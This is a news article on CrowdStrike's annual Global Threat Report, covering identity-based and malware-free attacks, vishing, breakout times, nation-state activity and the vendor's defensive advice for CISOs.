Threat actors increasingly using stolen credentials to compromise cloud assets, warns the company's annual threat report.
CISOs should be moving “as fast as they can” to close holes in their identity and access management infrastructure to block cyber attacks, says a CrowdStrike executive.
Adam Meyers, senior vice president of counter adversary operations, made the comment Monday on the release of CrowdStrike’s annual Global Threat Report, an analysis of 2024 data from customers.
The report noted that 79% of initial detections of attacks didn’t include malware; abusing valid accounts has become the primary initial access vector to organizations’ cloud assets, accounting for 35% of cloud incidents in the first half of 2024.
Attackers changing tactics
“Threat actors have figured out that trying to bring malware [in an initial compromise] is like going to the airport with a bottle of water in your pack — you’re probably going to get caught,” Meyers said in an interview, noting that defensive technology like endpoint detection and response [EDR] is good at catching malware. So, he said, “what is increasingly happening is threat actors are trying to move away from being detected [through EDR] and doing it with identity. This is a trend we’ve seen over the past two years or so and is really on the uptick, and is continuing to evolve.”
But, he warned, “multi-factor authentication [MFA] is not a silver bullet, and you need to have identity threat detection and response capability in your [IT] environment or sad things are going to happen.”
“It’s the old [hockey] adage,” he added. “’Skate to where the puck is going, not to where it’s at right now.'”
Among the report’s findings:
- Breakout time — how long it takes for an adversary to start moving laterally across at IT network — reached an all-time low last year. The average fell to 48 minutes, while the fastest breakout time dropped to a mere 51 seconds;
- Voice phishing (vishing) attacks, where adversaries call victims to amplify their activities with persuasive social engineering techniques, saw explosive growth — up 442% between the first and second halves of 2024.
This is part of a trend CrowdStrike sees from commodity malware operators — a shift from phishing to other tactics including callback phishing and help desk social engineering attacks; - Attacks related to initial access boomed, accounting for 52% of vulnerabilities observed by CrowdStrike in 2024. Providing access as a service became a thriving business for threat actors, as advertisements for access brokers increased 50% year-over-year;
- Among nation-states, China-nexus activity surged 150% overall, with some targeted industries suffering 200% to 300% more attacks than the previous year;
- GenAI played a pivotal role in sophisticated cyberattack campaigns last year. It enabled a North Korean-aligned threat actor dubbed Famous Chollima to create highly convincing fake IT job candidates that infiltrated victim organizations, and it helped China-, Russia-, and Iran-affiliated threat actors conduct AI-driven disinformation and influence operations to disrupt elections.
As an example of a malware-free attack, the report outlined tactics used by a threat actor it dubs Curly Spider, which it described as “one of the fastest and most adaptive eCrime adversaries, executing high-speed, hands-on intrusions.”
After firing a large volume of spam emails impersonating charities, newsletters, or financial offers to an employee, a gang member calls the target posing as a help desk or IT support member. They claim the spam is caused by malware or outdated spam filters. The employee is told to join a remote session using a tool like Microsoft Quick Assist or TeamViewer (the gang member even helps them download the tool). That lets the attacker into the IT system to download malicious payloads using curl or PowerShell, and to establish persistence through a backdoor.
Another common threat actor tactic is calling a targeted organization’s IT help desk pretending to be a legitimate employee, and attempting to persuade support to reset passwords and/or multi-factor authentication (MFA) for an account.
Advice for CISOs
To stop these kinds of attacks, CrowdStrike urges CISOs to require video authentication with government identification for employees who call to request self-service password resets, and to train help desk employees to be cautious when taking password and MFA reset request phone calls made outside of business hours, particularly if an unusually high number of requests is made in a short time frame or if the caller purports to be calling on behalf of a colleague.
It also helps to switch to additional, non-push-based authentication such as FIDO2 to prevent account compromise.
Meyers also said that, because threat actors are increasingly exploiting unpatched vulnerabilities, CISOs need to change their patch management strategy.
Most organizations prioritize patching either by the prevalence of the vulnerability in their IT environment, or by severity using a CVSS criticality score. However, he noted, threat actors these days are chaining low-scoring vulnerabilities that they can use to create a higher criticality vulnerability.
“Think about doing your patch management based on what your adversaries are actually exploiting,” Meyers advised CISOs. A vulnerability with a score of 7 may seem high, but not if it’s hard to exploit, he said. On the other hand, a lower severity vulnerability that’s being exploited against your firm’s vertical or geographic region is more important to remediate than others.
The full report is available for download. Registration is required.
